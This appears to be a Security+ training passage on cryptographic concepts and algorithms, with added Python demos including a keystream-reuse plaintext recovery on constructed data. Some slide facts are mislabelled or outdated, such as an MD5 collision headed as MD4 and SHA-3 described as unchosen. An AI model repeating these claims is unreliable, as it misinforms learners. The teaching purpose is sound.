–Symmetric key
–A continuous stream of bits/bytes is encrypted one at a time, by XORing each with a keystream derived from the key
–Faster and uses less processing power than block ciphers
–Pseudorandom keystream generators will repeat eventually
• The longer the period before a repeat, the better
–Never reuse a keystream (the same key and nonce) for two messages: XORing the two ciphertexts cancels the keystream and exposes the XOR of the plaintexts
Encryption/Decryption Methods
Diagram: Plaintext stream -> Stream Cipher (with secret key) -> ciphertext stream
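An added example, not from the course, of the stream-cipher failure mode that matters most in practice: keystream reuse. The keystream generator here is a constructed stand-in built from SHA-256 in counter mode (real stream ciphers such as RC4 or ChaCha20 differ in construction but share the property), and the key, nonces and messages are constructed; the function names are this example's own.

```python
"""Added example (not from the original course): a toy stream cipher and the
"two-time pad" leak that results from reusing its keystream.

The keystream generator (SHA-256 over key || nonce || counter) is a constructed
stand-in for a real stream cipher; key, nonces and messages are constructed too.
The lesson holds for any stream cipher: one (key, nonce) pair, one message."""

import hashlib


def keystream(key, nonce, length):
    """Deterministic pseudorandom bytes for a (key, nonce) pair.

    As with every stream cipher the output for a given pair is fixed, which is
    exactly why the pair must never be used for two different messages."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key, nonce, plaintext):
    """Ciphertext is plaintext XOR keystream, byte by byte."""
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


decrypt = encrypt  # XOR with the same keystream undoes itself


def two_time_pad_leak(c1, c2):
    """If c1 and c2 used the same keystream, c1 XOR c2 == p1 XOR p2: the
    keystream cancels and the attacker holds the XOR of the two plaintexts."""
    return xor(c1, c2)


def recover_with_crib(c1, c2, known_p1):
    """Knowing (or guessing) p1 then reveals p2 outright."""
    return xor(two_time_pad_leak(c1, c2), known_p1)


# Constructed key and messages; both messages have the same length.
KEY = b"constructed-example-key"
P1 = b"transfer $100 to account 4242"
P2 = b"transfer $999 to account 1337"

if __name__ == "__main__":
    c1 = encrypt(KEY, b"nonce-A", P1)
    c2 = encrypt(KEY, b"nonce-A", P2)       # same key AND same nonce: the bug
    print("round trip ok:", decrypt(KEY, b"nonce-A", c1) == P1)
    print("c1 ^ c2 == p1 ^ p2:", two_time_pad_leak(c1, c2) == xor(P1, P2))
    print("attacker recovers p2:", recover_with_crib(c1, c2, P1))
    c3 = encrypt(KEY, b"nonce-B", P2)       # fresh nonce: the crib gets garbage
    print("with a fresh nonce:", recover_with_crib(c1, c3, P1))
```

The crib attack needs no knowledge of the key at all; it is the reason protocols such as WEP (which reused RC4 keystreams through short IVs) failed, and why the IV or nonce on the slides is not optional.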
• Elliptic curve cryptography (ECC)
–Asymmetric keys
–Security rests on the elliptic curve discrete logarithm problem rather than on integer factorization (RSA), so much shorter keys give equivalent strength; a 256-bit ECC key is comparable to a 3072-bit RSA key
–Keys are still numbers: the private key is a scalar and the public key is a point on the curve
–Used in many varied implementations, including mobile devices, where the small keys and fast operations matter
Encryption/Decryption Methods
• Quantum cryptography
–An emerging and expensive concept that is still being researched
–Measuring quantum data disturbs it
• Inspecting polarized photons changes their polarization
–Quantum cryptography therefore lets the parties tell if the transmission was eavesdropped on
• Polarize the photons in one direction for 0 and another direction for 1
–The main practical implementation is quantum key distribution (QKD): the quantum channel agrees a key, and conventional ciphers then encrypt the data
Encryption/Decryption Methods
• Hashing algorithms produce a fixed-length hash value that is a summary or digest of a message; for a strong hash, two different inputs with the same digest (a collision) are infeasible to find
• One way only
–You cannot get the plaintext back from a hash
• Used for integrity: if data is modified then a different hash value results
–Message digest (another name for the hash value)
–Digital signatures
–Message authentication codes (MAC)
• Used for password storage
–Store a salted, deliberately slow hash of the password rather than the password itself
–Check the hash of the entered password against the stored hash
Cryptographic Hashing
• A mathematical function that takes any sized blocks of data and returns fixed-sized bit streams
Cryptographic Hashing
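The two uses above, an integrity digest and password storage, in Python's standard library, as an added example that is not part of the course. It places the unsalted hash that should not be used beside the salted, iterated form; the passwords and salts are constructed.

```python
"""Added example (not from the original course): hashing for integrity and for
password storage, with the unsalted form shown only to contrast it.

Passwords and salts here are constructed for the example."""

import hashlib
import hmac
import os


def digest(data):
    """Fixed-length SHA-256 message digest; any change to `data` changes it."""
    return hashlib.sha256(data).hexdigest()


def naive_password_hash(password):
    """What NOT to do: an unsalted, fast hash. Every user with this password
    gets the same value, and precomputed tables crack it in bulk."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_password_record(password, salt=None, iterations=600_000):
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). A random per-user salt
    defeats precomputed tables; the iteration count slows every guess."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}


def verify_password(password, record):
    """Recompute with the stored salt and iteration count, then compare in
    constant time so the comparison itself leaks nothing."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["hash"])


if __name__ == "__main__":
    print("same digest for same data:", digest(b"pay 100") == digest(b"pay 100"))
    print("one char changed:         ", digest(b"pay 100") == digest(b"pay 1000"))
    print("naive hashes collide across users:",
          naive_password_hash("Winter2024") == naive_password_hash("Winter2024"))
    a = make_password_record("Winter2024")
    b = make_password_record("Winter2024")
    print("salted records differ:", a["hash"] != b["hash"])
    print("correct password:", verify_password("Winter2024", a),
          " wrong password:", verify_password("winter2024", a))
```

The record stores the salt and iteration count alongside the hash, so the parameters can be raised later without a format change; only the verification path ever sees the password.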
Digital Signatures and Hashing
Sender:
1. Run the message through the hash function to get a hash (#)
2. Encrypt the hash with the sender’s private key; the result is the digital signature
3. Attach the signature to the message and send both to the recipient
Recipient:
4. Decrypt the signature with the sender’s public key to recover the sender’s hash
5. Run the received message through the same hash function
6. Compare the two hashes: a match confirms integrity and the sender’s identity
• Encryption is used to protect transmissions that pass over the public internet
–VPN
• IPSec
–Web browser / web server communication
• TLS (SSL is its deprecated predecessor and should no longer be used)
• HTTPS (HTTP over TLS)
–Data transfer and remote management
• SSH
Transport Encryption
• Hiding or embedding one message within another
• The main purpose is to not draw attention
• Text can be hidden in image, audio, or video files
–One method for image steganography overwrites the least significant bit of each pixel’s color value with a bit of the message; the change is invisible to the eye
–Can encrypt data before and/or after the message is hidden
• Sometimes called electronic watermarking when referring to labeling an image for anti-piracy purposes
• Steganography tools are readily available
–Often used for illicit activities like data theft
Steganography
• Only use algorithms that, as of today, are considered strong
–Think about the tradeoff between security, speed, and ease of implementation
• Stay informed on cryptography news
– In the past widely used algorithms were “broken”
–New methods are being developed all the time
• Leverage strong encryption with good key management
Use of Proven Technologies
Key Terms You Should Know
Cryptography: The science and study of the methods and procedures for encrypting and decrypting data
Cipher or Cypher: The pair of algorithms that encrypt and decrypt the data
Key: A string of bits used by a cryptographic algorithm during the encryption/decryption process
Plaintext: The original unencrypted data or message
Ciphertext or Cyphertext: The data after it has been encrypted. Data is not usable in this form
CompTIA Security+ Training
Cryptography Concepts
Key Terms You Should Know
Term Definition
Non-repudiation A method of assuring that the author of a message can not later refute the fact that they sent a message
Symmetric Encryption Encryption/decryption using a single shared secret key
Asymmetric Encryption Encryption/decryption using a mathematically related key pair
Block Cipher A symmetric encryption method that processes data in fixed-length blocks
Stream Cipher A symmetric encryption method that processes data one bit or byte at a time
CompTIA Security+ Training
Cryptography Concepts
Key Terms You Should Know
Term Definition
Elliptic Curve Cryptography
An asymmetric encryption method that uses elliptical curves to achieve stronger and faster encryption with shorter key lengths
Quantum Cryptography An encryption method that uses physics instead of mathematics
Transport Encryption Encrypting data for protection during transit
Hashing One way encoding that is used for data integrity
Digital Signature
Used to electronically sign a message so that the receiver can verify the sender’s identify and confirm that the message was not altered during transit
What We Covered
Cryptography Overview
Symmetric vs. Asymmetric Encryption
Digital Signatures
Non-repudiation
Encryption/Decryption Methods
• Block Cipher
• Stream Cipher
• Elliptic Curve Cryptography (ECC)
• Quantum Cryptography
Cryptographic Hashing
Transport Encryption
Steganography
Use of Proven Technologies
CompTIA Security+ Training Instructor: Lisa Szpunar
Cryptography Tools
In This Lesson:
Exam Objective: 6.2 Use and apply appropriate cryptographic tools and products
Symmetric Encryption
DES
3DES
AES
RC4
Blowfish
Twofish
Asymmetric Encryption
Diffie-Hellman
RSA
ECC
Cryptographic Hashing
SHA
MD5
RIPEMD
HMAC
Transport Encryption
SSL/TLS and HTTPS
SSH
IPSec
Wireless Encryption
WEP vs. WPA/WPA2
Wi-Fi Authentication
Other Encryption Tools
PGP/GPG
One-time Pads
CHAP and PAP
NTLM and NTLMv2
Whole Disk Encryption
Comparative Strengths of Algorithms
Data Confidentiality Algorithms
Data Integrity Algorithms
Symmetric Encryption
DES (Data Encryption Standard)
Key Length: 64-bit (8 bits of parity)
Block Size: 64-bit
• Used For
–Data confidentiality
• How It Works
–Key is broken into 16 subkeys
–Each of the 16 rounds, or Feistel cycles, uses a different subkey
–Each round has a substitution phase and a permutation (scrambling) phase
• History
–One of the oldest encryption standards
–Selected to be the official U.S. encryption standard in 1979
• Security Considerations
–Very vulnerable to brute force attacks
–Not secure by today’s standards
• Can be cracked within a day’s time
3DES (Triple Data Encryption Standard)
Key Length: 168-bit
Block Size: 64-bit
• Used For
–Data confidentiality
• How It Works
–Uses three rounds of DES
• Either three different keys or two alternating keys
–3 times slower than DES
• History
–Created to increase the strength of DES
• Security Considerations
–Still in use but less secure than AES
[Diagram: Plaintext → DES with Key 1 → DES with Key 2 → DES with Key 1 → Ciphertext]
AES (Advanced Encryption Standard)
Key Length: 128-bit, 192-bit, or 256-bit
Block Size: 128-bit
• Used For
–Data confidentiality
–WPA2
–Can be used in low processing power implementations
• How It Works
–The 128-bit block is broken into 4 parts
–Uses iterative rounds instead of Feistel rounds
–Number of rounds depends on the key size
• History
–The Rijndael algorithm became the U.S. standard for encryption in 2002
• Security Considerations
–Considered strong by today’s standards
RC4 (Rivest Cipher 4)
Key Length: 40 to 204-bit
• Used For
–Data confidentiality
–SSL and WEP
• How It Works
–Stream cipher
• History
–Developed by Ron Rivest in 1987
–Ron Rivest has designed several different ciphers, RC1 through RC6
–RC4 has been the most widely used stream cipher
• Security Considerations
–Not in use much today
–Some implementations are more secure than others
• It all comes down to the key
Blowfish
Key Length: 1 to 448-bit
Block Size: 64-bit
• Used For
–Multipurpose
• How It Works
–Fast block cipher
–Uses 16 Feistel rounds
–Very complex key schedule
• History
–Produced by Bruce Schneier
–Unpatented since its creation
• Security Considerations
–Variants with fewer than 16 Feistel rounds are vulnerable to attack
–Considered strong if implemented correctly
Twofish
Key Length: 128 to 256-bit
Block Size: 128-bit
• Used For
–Multipurpose
• How It Works
–Fast block cipher
–Uses 16 Feistel rounds
–Very complex key schedule
• History
–Also created by Bruce Schneier, with help from other cryptographers
–Was in contention to become AES
• Security Considerations
–Variants with fewer than 16 Feistel rounds are vulnerable to attack
–Considered strong if implemented correctly
Asymmetric Encryption
Diffie-Hellman
Named for Whitfield Diffie and Martin Hellman
Key Length: Variable
• Used For
–Key exchange
• Lets two (or more) parties that don’t know each other establish a jointly shared secret key
• How It Works
–Easy to compute but hard to reverse
• History
–The original public/private key concept
• Security Considerations
–No authentication by itself
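The exchange described above, worked through in Python as an added example (this is not code from the slides or from any library). The group parameters P and G are an assumption made for readability: P is the Mersenne prime 2^61 - 1 and G a small base, which is far too small for real use; deployed systems use standardized groups with 2048-bit or larger primes. Only the two public values cross the network, and both parties end up with the same symmetric key.

```python
import hashlib
import secrets

# Toy group parameters (an assumption for this example, not from the slides).
# P is the Mersenne prime 2^61 - 1, so arithmetic mod P is well defined, and G is
# a small base.  Real deployments use standardized groups with primes of 2048
# bits or more; these numbers only show the mechanics.
P = 2**61 - 1
G = 5


def make_private_key() -> int:
    """A party's secret exponent.  Random, and never sent over the wire."""
    return secrets.randbelow(P - 3) + 2          # uniform in [2, P-2]


def make_public_value(private_key: int) -> int:
    """G^a mod P: easy to compute, hard to reverse (discrete logarithm)."""
    return pow(G, private_key, P)


def make_shared_secret(private_key: int, peer_public_value: int) -> int:
    """(G^b)^a mod P equals (G^a)^b mod P, so both sides land on the same number."""
    return pow(peer_public_value, private_key, P)


def derive_symmetric_key(shared_secret: int) -> bytes:
    """Turn the agreed number into a fixed-length key for a symmetric cipher."""
    return hashlib.sha256(shared_secret.to_bytes(8, "big")).digest()


def run_exchange() -> dict:
    """Simulate Alice and Bob; only the two public values would cross the network."""
    a = make_private_key()
    b = make_private_key()
    alice_sends = make_public_value(a)           # Alice -> Bob
    bob_sends = make_public_value(b)             # Bob -> Alice
    # Nothing in the exchange proves who generated alice_sends or bob_sends.
    # That is the slide's "no authentication by itself": protocols such as
    # TLS and IPSec sign or otherwise authenticate these values.
    return {
        "alice_key": derive_symmetric_key(make_shared_secret(a, bob_sends)),
        "bob_key": derive_symmetric_key(make_shared_secret(b, alice_sends)),
        "on_the_wire": (alice_sends, bob_sends),  # all an eavesdropper sees
    }


if __name__ == "__main__":
    result = run_exchange()
    print("keys match:", result["alice_key"] == result["bob_key"])
```

The private exponents never leave `run_exchange`; an observer holding both values in `on_the_wire` would have to solve the discrete logarithm to recover either one.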
RSA
Named for Ron Rivest, Adi Shamir, and Leonard Adleman
Key Length: 1,024 to 4,096-bit
• Used For
–Key exchange
–Data confidentiality and digital signatures
• How It Works
–Uses two large prime integers
• It is easy to find the product of the two primes but hard to find the primes from the product
–100 times slower than DES
• History
–Published in the late 1970s
• Security Considerations
–Problems arise when using prime numbers that are too small
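The digital signature flow from the "Digital Signatures and Hashing" diagram earlier in the lesson (hash, encrypt the hash with the sender's private key, decrypt with the public key, compare hashes) can be carried out with textbook RSA. The block below is an added example, not code from the slides or from any RSA library. The two primes are an assumption chosen to keep the numbers readable; real keys use randomly generated primes giving a 2048-bit or larger modulus, and real signature schemes (PKCS#1 v1.5 or PSS) pad the full digest instead of truncating it.

```python
import hashlib

# Toy RSA key (an assumption for this example, not from the slides): two fixed
# primes small enough to read.  Real keys use randomly generated primes giving
# a 2048-bit or larger modulus; this key only shows the mechanics.
P = 1_000_000_007
Q = 998_244_353
N = P * Q                                 # public modulus
E = 65537                                 # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))         # private exponent (Python 3.8+)


def message_hash(message: bytes) -> int:
    """Hash the message; truncate so the value is below the toy modulus N.

    Real RSA signatures (PKCS#1 v1.5 or PSS) pad the full digest instead of
    truncating it; the truncation here is only a shortcut for the small key.
    """
    digest = hashlib.sha256(message).digest()
    return int.from_bytes(digest[:7], "big")    # 56 bits, always < N


def sign(message: bytes, private_exponent: int = D) -> int:
    """Sender: 'encrypt' the hash with the private key (the diagram's left-hand path)."""
    return pow(message_hash(message), private_exponent, N)


def verify(message: bytes, signature: int) -> bool:
    """Recipient: 'decrypt' with the public key, re-hash the message, compare hashes."""
    recovered_hash = pow(signature, E, N)
    return recovered_hash == message_hash(message)


if __name__ == "__main__":
    msg = b"Invoice 1042: pay 5,000 EUR to account X"     # constructed sample
    sig = sign(msg)
    print("genuine verifies:", verify(msg, sig))
    print("tampered verifies:", verify(msg.replace(b"5,000", b"50,000"), sig))
```

Changing a single byte of the message changes its hash, so the value recovered from the signature no longer matches and `verify` returns False; that is the integrity and non-repudiation property the slides describe, because only the holder of D could have produced a signature that verifies under E.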
ECC (Elliptic Curve Cryptography)
Key Length: Variable
• Used For
–Smaller, less powerful devices like
• How It Works
–An elliptic curve and one point on the curve are chosen and made public
–Multiplying the chosen point on the curve by a secret number produces another point on the curve
• It is very difficult to find out what number was used
• History
–A cryptography concept with many implementations
–Many companies have their own version of ECC
• Security Considerations
–Still being studied but currently considered strong if parameters are chosen properly
Cryptographic Hashing
Collisions
Example Collision for MD4
Input A:
d131dd02c5e6eec4693d9a0698aff95c 2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a 085125e8f7cdc99fd91dbd7280373c5b
d8823e3156348f5bae6dacd436c919c6 dd53e23487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080280d1e c69821bcb6a8839396f965ab6ff72a70
Input B:
d131dd02c5e6eec4693d9a0698aff95c 2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a 085125e8f7cdc99fd91dbdf280373c5b
d8823e3156348f5bae6dacd436c919c6 dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1e c69821bcb6a8839396f9652b6ff72a70
Same Hash Value: 79054025255fb1a26e4bc422aef54eb4
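The two 128-byte inputs reproduced above are the widely published colliding pair for MD5, and the digest shown (79054025255fb1a26e4bc422aef54eb4) is their MD5 value. The block below is an added example, not part of the slides: it feeds both inputs, copied from the slide with the spaces removed, to Python's hashlib, lists the six byte positions where they differ, and checks that they collide under MD5 but not under SHA-256. Running the same check before trusting a hash-based integrity control is a cheap way to confirm which algorithms a system still relies on.

```python
import hashlib

# The two 128-byte inputs from the slide above, hex copied with the spaces removed.
INPUT_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)
INPUT_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)


def differing_byte_offsets(a: bytes, b: bytes) -> list:
    """Byte positions where the two inputs differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def collides(a: bytes, b: bytes, algorithm: str) -> bool:
    """True when two *different* inputs produce the same digest under `algorithm`."""
    if a == b:
        return False
    return hashlib.new(algorithm, a).digest() == hashlib.new(algorithm, b).digest()


def digest_hex(data: bytes, algorithm: str) -> str:
    """Hex digest of `data` under the named hashlib algorithm."""
    return hashlib.new(algorithm, data).hexdigest()


if __name__ == "__main__":
    print("bytes that differ:", differing_byte_offsets(INPUT_A, INPUT_B))
    for algo in ("md5", "sha1", "sha256"):
        print(f"{algo:7s} A={digest_hex(INPUT_A, algo)[:16]}... "
              f"B={digest_hex(INPUT_B, algo)[:16]}... "
              f"collide={collides(INPUT_A, INPUT_B, algo)}")
```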
SHA (Secure Hash Algorithm)
Hash Length: 256-bit (SHA-256), 512-bit (SHA-512)
Block Size: 512-bit (SHA-256), 1024-bit (SHA-512)
• Used For
–Digital signatures
• How It Works
–Breaks the message into words and groups the words into blocks before processing for 64 or 80 rounds
–SHA-2 is the current version and outputs a 256-bit hash or longer
–The longer hash length version (SHA-512) accepts larger inputs and processes larger block sizes
• History
–Designed and published by NSA and NIST
–SHA-1 used a 160-bit hash and has been replaced with SHA-2
–The SHA-3 algorithm has not yet been chosen from the finalists
• Security Considerations
–SHA-1 has been found to have collisions
MD5 (Message Digest 5)
Hash Length: 128-bit
Block Size: 512-bit
• Used For
–Message digest
• How It Works
–Breaks the message into 512-bit blocks with a mandatory 64 bits of padding
–Then breaks the blocks into 32-bit chunks
–Does 4 rounds of processing
• History
–Developed in 1991
–Others in the series are MD2, MD4, and MD6
–MD5 is slightly slower but more secure than MD4
• Security Considerations
–Collisions are possible and it is not considered secure
RIPEMD (RACE Integrity Primitives Evaluation Message Digest)
Hash Length: 160-bit or 128-bit (insecure)
Block Size: Variable
• Used For
–Message digest
• How It Works
–Three rounds of processing on blocks of variable sizes
• History
–RIPEMD is based on MD4 and RIPEMD-160 is based on MD5
• Security Considerations
–The 128-bit version was found to have collisions
–Hash outputs longer than 160 bits are in use but are no stronger than the 160-bit version
HMAC (Hash-based Message Authentication Code)
• Used For
–Message authentication codes
• Data integrity and authentication
• How It Works
–Uses a hashing function with a secret key
–Can use MD5 or SHA
• Example: If SHA-256 is used the result is referred to as HMAC-SHA256
• Security Considerations
–The strength of HMAC depends on the hashing function used and the length of the key
• The addition of the secret key makes HMAC stronger than the hashing function alone
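The point that the secret key makes HMAC stronger than the hash alone, shown in Python with the standard library's hmac module as an added example (not code from the slides). The sample messages and the 32-byte key are constructed for the demonstration: with a bare hash, whoever alters the message can simply recompute the hash and the integrity check still passes; with HMAC-SHA256 the same alteration fails, because a valid tag cannot be produced without the key.

```python
import hashlib
import hmac
import secrets


def make_tag(key: bytes, message: bytes, algorithm: str = "sha256") -> bytes:
    """HMAC over the message; with sha256 this is the slide's HMAC-SHA256."""
    return hmac.new(key, message, algorithm).digest()


def verify_tag(key: bytes, message: bytes, tag: bytes, algorithm: str = "sha256") -> bool:
    """Recompute and compare in constant time (compare_digest avoids timing leaks)."""
    return hmac.compare_digest(make_tag(key, message, algorithm), tag)


def verify_plain_hash(message: bytes, digest: bytes) -> bool:
    """The keyless check a bare hash offers: anyone can recompute it."""
    return hashlib.sha256(message).digest() == digest


def compare_checks(key: bytes) -> dict:
    """Show why the key matters: alter a message and try to pass each check."""
    original = b"transfer 100 to account 42"        # constructed sample
    altered = b"transfer 900 to account 42"
    return {
        # A bare hash travels with the message; whoever alters the message just
        # recomputes the hash, so the integrity check still passes.
        "plain_hash_accepts_altered": verify_plain_hash(
            altered, hashlib.sha256(altered).digest()),
        # With HMAC the forger has no key.  Reusing the old tag fails ...
        "hmac_accepts_old_tag": verify_tag(key, altered, make_tag(key, original)),
        # ... and so does substituting a keyless hash for the tag.
        "hmac_accepts_keyless_hash": verify_tag(
            key, altered, hashlib.sha256(altered).digest()),
        # The legitimate message with its legitimate tag still verifies.
        "hmac_accepts_genuine": verify_tag(key, original, make_tag(key, original)),
    }


if __name__ == "__main__":
    # RFC 2104 recommends a key at least as long as the hash output (32 bytes here).
    demo_key = secrets.token_bytes(32)
    for name, outcome in compare_checks(demo_key).items():
        print(f"{name}: {outcome}")
```

Passing `"md5"` as the algorithm gives HMAC-MD5, which the slide lists as an option; the key still has to be kept secret on both ends, and `hmac.compare_digest` rather than `==` should be used for the comparison so that a wrong tag is rejected in constant time.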
Transport Encryption
SSL/TLS and HTTPS (Secure Sockets Layer / Transport Layer Security and Hypertext Transfer Protocol Secure)
• Used For
–SSL/TLS allows HTTPS and other client/server applications to communicate securely across an insecure network
• Offers protection from eavesdropping, tampering, and message forgery
• How It Works
–TLS uses a handshake for both parties to authenticate and agree on parameters, including a symmetric key
• History
–SSL was created by Netscape
–TLS improved on and superseded SSL
• Security Considerations
–Only as strong as the ciphers and hashing algorithms agreed upon by both sides
SSH (Secure Shell)
• Used For
–Secure remote sessions, file transfers, tunneling, port forwarding, and more
• How It Works
–Uses a handshake to set up parameters and performs a key exchange
• Security Considerations
–Only as strong as the ciphers and hashing algorithms agreed upon by both sides
IPSec (Internet Protocol Security)
• Authentication Header (AH)
–Digitally signs the packets for authentication and integrity
• Before a packet is sent, a hash is taken of the packet plus the shared secret key
• That hash is added to the header and the packet is sent
• On the recipient’s end the message payload and the secret key are hashed again
• If the original hash and the new hash match we have authentication and integrity
[Diagram, AH packet: Original IP Header | AH | TCP | Payload]
• Encapsulating Security Payload (ESP)
–Adds confidentiality and optionally integrity checking
• Adds a header, a trailer, and an integrity check value (ICV)
• The optional ICV works like the AH
• The ESP Header includes properties for the packet like a sequence number
• The ESP Trailer is for padding
[Diagram, ESP packet: Original IP Header | ESP Header | TCP | Payload | ESP Trailer | ESP Authentication]
Wireless Encryption
WEP vs. WPA/WPA2
| | WEP | WPA | WPA2 |
|---|---|---|---|
| Algorithm | RC4 | RC4 | AES |
| Key Size | 64-bit or 128-bit | 128-bit | 128-bit |
| Added Security | None | TKIP | CCMP |
| Weakness | Can be cracked in a matter of hours | TKIP is vulnerable to spoofing | Denial of Service |
| Strength | | Uses an IV and a second key to produce dynamic per-packet keys | 48-bit initialization vector |
| Integrity Check | Cyclic redundancy check | Message integrity check | |
| Backward Compatible | N/A | Yes | No |
Wi-Fi Authentication
• Pre-shared Key (PSK)
–WPA-Personal
–Intended for personal or home networks
–A key must be configured on the client devices that matches the key on the access point
–All the clients share a key
• WEP: It is possible to derive the key from captured packets
• WPA: Uses this key to generate the dynamic keys
–This method is still vulnerable, especially if a weak passphrase is chosen as the pre-shared key
• Enterprise Authentication
–WPA-Enterprise
–Uses 802.1X and a RADIUS or other authentication server to handle authentication
Other Encryption Tools
PGP/GPG (Pretty Good Privacy and GNU Privacy Guard)
• Used For
–An encryption system most often used for email
• Data confidentiality, authentication, and digital signatures
• How It Works
–Uses several algorithms
• Both symmetric and asymmetric encryption
–Both ends of the communication need a PGP/GPG client
–Creates a web of trust with certificates
• A certificate binds a key to its owner
• If you trust a person and their certificate, you sign their cert
• You can trust the certs signed by the people you trust
• History
–PGP was introduced in 1991 and is commercially available
–GPG was originally released in 1999 and does not use any restricted or patented algorithms by default
• Security Considerations
–Pretty good!
One-time Pads (OTP)
• Used For
–Data confidentiality
• How It Works
–A shared secret key (pad) is used that is the same length as the message
• The key is a completely random string of text, therefore the keyspace is infinite
–The characters in the key are added one by one to the message characters (numeric equivalents)
–The reverse is done for decryption
• History
–An old concept that was described in the 1800s and patented in the early 1900s
–Used by the U.S. military as an early cryptography tool
• Security Considerations
–Not vulnerable to brute force attacks
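The letter-by-letter addition the slide describes, implemented in Python as an added example (not code from the slides). Letters are mapped to numeric equivalents A=0 to Z=25, each pad letter is added to the matching message letter modulo 26, and decryption subtracts it again. The `PadBook` class is an assumption added to enforce the two properties that make the scheme unbreakable: the pad must be at least as long as the message, and no stretch of pad is ever handed out twice.

```python
import secrets
import string

ALPHABET = string.ascii_uppercase   # the slide's "numeric equivalents": A=0 ... Z=25


def make_pad(length: int) -> str:
    """A truly random pad from the OS CSPRNG, one letter per message letter."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def normalize(text: str) -> str:
    """Keep only letters, upper-cased, so every character has a numeric equivalent."""
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def _combine(text: str, pad: str, direction: int) -> str:
    if len(pad) < len(text):
        raise ValueError("pad must be at least as long as the message")
    out = []
    for m, k in zip(text, pad):
        out.append(ALPHABET[(ALPHABET.index(m) + direction * ALPHABET.index(k)) % 26])
    return "".join(out)


def encrypt(plaintext: str, pad: str) -> str:
    """Add each pad letter to the matching message letter, mod 26."""
    return _combine(normalize(plaintext), pad, +1)


def decrypt(ciphertext: str, pad: str) -> str:
    """The reverse: subtract each pad letter, mod 26."""
    return _combine(ciphertext, pad, -1)


class PadBook:
    """Hands out each stretch of pad exactly once: a reused pad is no longer one-time."""

    def __init__(self, pad: str):
        self._pad = pad
        self._used = 0

    def take(self, length: int) -> str:
        if self._used + length > len(self._pad):
            raise ValueError("pad exhausted; a new pad must be shared")
        chunk = self._pad[self._used:self._used + length]
        self._used += length
        return chunk

    @property
    def remaining(self) -> int:
        return len(self._pad) - self._used


if __name__ == "__main__":
    book = PadBook(make_pad(64))                 # constructed sample pad
    message = "ATTACK AT DAWN"
    key = book.take(len(normalize(message)))
    ct = encrypt(message, key)
    print(ct, "->", decrypt(ct, key), "| pad letters left:", book.remaining)
```

Because every pad letter is uniformly random and used once, every plaintext of the same length is equally consistent with a given ciphertext, which is why the slide can say the scheme is not vulnerable to brute force; the practical cost is that a pad as long as all future traffic has to be generated and delivered securely first.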
CHAP and PAP (Challenge-Handshake Authentication Protocol and Password Authentication Protocol)
• Used For
–Authentication for PPP
• How PAP Works
–Usernames and passwords are sent in cleartext to be checked
• How CHAP Works
–Uses a challenge-response procedure to authenticate the client
1. The server sends a string of challenge text to the client
2. The client hashes the challenge string using a shared secret as a key and sends the result back to the server
3. The server compares the hash to a stored hash
• History
–CHAP was specified in RFC 1994
–Microsoft has its own versions called MS-CHAP and MS-CHAPv2
• Security Considerations
–PAP has no encryption and is completely insecure
–A weak password used as the secret key makes CHAP vulnerable to brute force and dictionary attacks
–Usernames and passwords may be stored in plaintext on the client or server side
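The three-step CHAP exchange above, simulated in Python with both sides' messages as an added example (not code from the slides). The response is computed the way RFC 1994 specifies for MD5, as MD5(Identifier || secret || Challenge); the server holds the shared secret so that it can recompute the expected response, which is the plaintext-storage point the slide raises. The `ChapServer` class, the credentials dictionary and the sample secret are constructed for the demonstration. Each challenge is fresh and accepted only once, so a captured response cannot be replayed.

```python
import hashlib
import hmac
import secrets


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP with MD5: Response = MD5(Identifier || secret || Challenge).

    The secret itself never crosses the link; only the challenge and this
    digest do, which is the difference from PAP's cleartext username/password.
    """
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapServer:
    """Authenticator side.  The credentials dictionary is a constructed sample."""

    def __init__(self, credentials: dict):
        # As the slide notes, the server keeps the shared secret itself: it
        # cannot store only a hash of it, because it must recompute the response.
        self._credentials = credentials            # username -> secret (bytes)
        self._outstanding = {}                     # username -> (identifier, challenge)

    def issue_challenge(self, username: str) -> tuple:
        identifier = secrets.randbelow(256)        # one-byte packet identifier
        challenge = secrets.token_bytes(16)        # fresh, unpredictable challenge
        self._outstanding[username] = (identifier, challenge)
        return identifier, challenge

    def check_response(self, username: str, response: bytes) -> bool:
        secret = self._credentials.get(username)
        pending = self._outstanding.pop(username, None)   # a challenge is usable once
        if secret is None or pending is None:
            return False
        identifier, challenge = pending
        expected = chap_response(identifier, secret, challenge)
        return hmac.compare_digest(expected, response)  # constant-time comparison


def client_login(server: ChapServer, username: str, secret: bytes) -> bool:
    """Peer side: receive the challenge, hash it with the secret, send the result."""
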